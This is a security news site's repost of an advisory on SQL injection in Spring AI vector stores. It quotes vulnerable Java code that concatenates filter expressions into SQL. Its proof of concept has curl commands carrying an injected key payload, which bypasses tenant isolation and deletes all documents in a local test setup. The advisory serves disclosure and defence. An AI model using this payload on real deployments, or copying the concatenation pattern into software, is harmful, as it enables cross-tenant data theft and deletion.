Close Menu

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    What's Hot

    US charges alleged operators of Russian bulletproof hosting service

    July 15, 2026

    Microsoft July 2026 Patch Tuesday fixes massive 570 flaws, 3 zero-days

    July 14, 2026

    Microsoft releases Windows 10 KB5099539 extended security update

    July 14, 2026
    Facebook X (Twitter) Instagram
    • Demos
    • Technology
    • Gaming
    • Buy Now
    Facebook X (Twitter) Instagram Pinterest Vimeo
    Canadian Cyber WatchCanadian Cyber Watch
    • Home
    • News
    • Alerts
    • Tips
    • Tools
    • Industry
    • Incidents
    • Events
    • Education
    Subscribe
    Canadian Cyber WatchCanadian Cyber Watch
    Home»Alerts»Spring AI SQL Injection in PgVectorStore and friends – Research Advisory
    Alerts

    Spring AI SQL Injection in PgVectorStore and friends – Research Advisory

    adminBy adminApril 27, 2026No Comments2 Mins Read
    Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
    Share
    Facebook Twitter LinkedIn Pinterest Email


    PgVectorStore, OracleVectorStore, and CouchbaseSearchVectorStore concatenate filter expression output directly into SQL without parameterization, enabling tenant isolation bypass, data exfiltration, and deletion of arbitrary rows. The SQL concatenation is in the framework’s store classes and converter’s doKey() method – even the programmatic FilterExpressionBuilder API is vulnerable. 

     

    // PgVectorStore.java (main branch) — same pattern in OracleVectorStore and CouchbaseSearchVectorStore

    String sql =

      “DELETE FROM ” + getFullyQualifiedTableName() +

      ” WHERE metadata::jsonb @@ ‘” + nativeFilterExpression +

      “‘::jsonpath”;

    this.jdbcTemplate.update(sql);

    PgVectorFilterExpressionConverter.doKey() concatenates “$.” + key.key() with no escaping. A single quote in the key terminates the SQL string literal. Additionally, emitJsonValue() does not escape single quotes (not special in JSON), so a single quote in a value also breaks the SQL.

    The primary PoC achieves full tenant bypass and data destruction using only FilterExpressionBuilder – no string concatenation in application code. The vulnerability is in the framework’s query construction, not in how the expression is built.

     

    Proof of Concept: 

    Start the database and application:

    docker compose -f poc/docker-compose.yml -p sqli-poc up -d

    cd poc/java-poc && ./mvnw spring-boot:run

    Legitimate request (returns only acme’s 2 documents):

    $ curl ‘http://localhost:8080/search?query=report&tenant=acme’

    {“result_count”: 2, “filter_key”: “tenant”, “filter_value”: “acme”, …}

    Bypass tenant isolation (returns all 5 documents from all 3 tenants). The injected key closes the jsonpath string, adds OR true, then re-opens a valid jsonpath to absorb the trailing SQL:

    $ curl -G http://localhost:8080/search \

      –data-urlencode “query=report” \

      –data-urlencode “key=tenant’::jsonpath OR true OR metadata::jsonb @@ ‘$.tenant” \

      –data-urlencode “tenant=x”

    {“result_count”: 5, …}

    Delete all documents across all tenants:

    $ curl -G http://localhost:8080/delete \

        –data-urlencode “key=tenant’::jsonpath OR true OR metadata::jsonb @@ ‘$.tenant” \

        –data-urlencode “tenant=x”

    {“status”: “deleted”, “remaining_documents”: 0}

     



    Source link

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleUse BLUR-IT to Increase Your OPSEC
    Next Article VulnCheck Initial Access Intelligence Update – September 2024 | Blog
    admin
    • Website

    Related Posts

    Alerts

    CISA Adds One Known Exploited Vulnerability to Catalog

    June 12, 2026
    Alerts

    FreePBX security advisory (AV26–596) – Canadian Centre for Cyber Security

    June 12, 2026
    Alerts

    SSA-879734 V1.0: Multiple Vulnerabilities in SCALANCE XM-400/XR-500 before V6.6.1

    June 12, 2026
    Add A Comment

    Comments are closed.

    Demo
    Top Posts

    Catchy & Intriguing

    March 17, 202677 Views

    The Canadian Password Playbook: Navigating Compliance and Building Strong Passwords

    March 25, 202634 Views

    IP Address Investigations and Local OSINT

    March 20, 202634 Views
    Stay In Touch
    • Facebook
    • YouTube
    • TikTok
    • WhatsApp
    • Twitter
    • Instagram
    Latest Reviews
    85
    Featured

    Pico 4 Review: Should You Actually Buy One Instead Of Quest 2?

    January 15, 2021 Featured
    8.1
    Uncategorized

    A Review of the Venus Optics Argus 18mm f/0.95 MFT APO Lens

    January 15, 2021 Uncategorized
    8.9
    Editor's Picks

    DJI Avata Review: Immersive FPV Flying For Drone Enthusiasts

    January 15, 2021 Editor's Picks

    Subscribe to Updates

    Get the latest tech news from FooBar about tech, design and biz.

    Demo
    Most Popular

    Catchy & Intriguing

    March 17, 202677 Views

    The Canadian Password Playbook: Navigating Compliance and Building Strong Passwords

    March 25, 202634 Views

    IP Address Investigations and Local OSINT

    March 20, 202634 Views
    Our Picks

    US charges alleged operators of Russian bulletproof hosting service

    July 15, 2026

    Microsoft July 2026 Patch Tuesday fixes massive 570 flaws, 3 zero-days

    July 14, 2026

    Microsoft releases Windows 10 KB5099539 extended security update

    July 14, 2026

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    Facebook X (Twitter) Instagram Pinterest
    • Home
    • Technology
    • Gaming
    • Phones
    • Buy Now
    © 2026 ThemeSphere. Designed by ThemeSphere.

    Type above and press Enter to search. Press Esc to cancel.